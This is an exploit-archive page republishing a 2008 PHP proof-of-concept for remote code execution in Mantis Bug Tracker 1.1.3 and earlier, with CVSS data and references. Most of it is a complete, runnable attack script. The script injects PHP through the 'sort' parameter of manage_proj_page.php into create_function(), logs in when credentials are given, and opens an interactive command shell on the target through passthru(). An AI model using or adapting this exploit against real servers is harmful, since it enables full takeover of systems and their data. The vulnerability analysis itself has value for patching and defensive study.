Mantis Bug Tracker <= 1.1.3 Remote Code Execution Exploit

2008.10.23
Credit: EgiX
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /* -------------------------------------------------------------------------------- Mantis Bug Tracker <= 1.1.3 (manage_proj_page.php) Remote Code Execution Exploit -------------------------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.mantisbt.org/ This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /manage_proj_page.php 32. $f_sort = gpc_get_string( 'sort', 'name' ); <=== this is taken and stripslashed from $_GET['sort'] 33. $f_dir = gpc_get_string( 'dir', 'ASC' ); (...) 89. $t_projects = multi_sort( $t_full_projects, $f_sort, $t_direction ); <=== and here is passed to multi_sort() 90. $t_stack = array( $t_projects ); [-] multi_sort() function defined into /core/utility_api.php 185. # -------------------- 186. # Sort a multi-dimensional array by one of its keys 187. function multi_sort( $p_array, $p_key, $p_direction=ASCENDING ) { 188. if ( DESCENDING == $p_direction ) { 189. $t_factor = -1; 190. } else { 191. # might as well allow everything else to mean ASC rather than erroring 192. $t_factor = 1; 193. } 194. 195. $t_function = create_function( '$a, $b', "return $t_factor * strnatcasecmp( \$a['$p_key'], \$b['$p_key'] );" ); 196. uasort( $p_array, $t_function ); 197. return $p_array; 198. } An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function() at line 195 into multi_sort() function body. By default only registered users can access to manage_proj_page.php (I've tested this on 1.1.3 version), because of this sometimes this PoC works only with a valid account. */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function check_login() { global $host, $path, $user, $pass, $cookie; $packet = "GET {$path}manage_proj_page.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match("/Location: login_page.php/", http_send($host, $packet))) { if (isset($pass)) { $payload = "username={$user}&password={$pass}"; $packet = "POST {$path}login.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID=".md5("foo")."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; if (!preg_match("/Set-Cookie: (.*);/", http_send($host, $packet), $match)) die("\n[-] Login failed...\n"); $cookie = $match[1]; } else die("\n[-] Credentials needed...\n"); } } print "\n+-------------------------------------------------------------------+"; print "\n| Mantis Bug Tracker <= 1.1.3 Remote Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] host path [user] [password]\n"; print "\nExample....: php $argv[0] localhost /mantis/"; print "\nExample....: php $argv[0] localhost / user pass\n"; die(); } $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; check_login(); $code = "']);}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23"; $packet = "GET {$path}manage_proj_page.php?sort={$code} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID=".md5("foo").(isset($cookie) ? "; {$cookie}" : "")."\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nmantis-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n"); } else break; } ?>

References:

https://bugs.gentoo.org/show_bug.cgi?id=242722
http://www.openwall.com/lists/oss-security/2008/10/19/1
http://www.milw0rm.com/exploits/6768
http://www.mantisbt.org/bugs/view.php?id=0009704
http://www.mantisbt.org/bugs/changelog_page.php
http://mantisbt.svn.sourceforge.net/viewvc/mantisbt/branches/BRANCH_1_1_0/mantisbt/core/utility_api.php?r1=5679&amp;r2=5678&amp;pathrev=5679


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top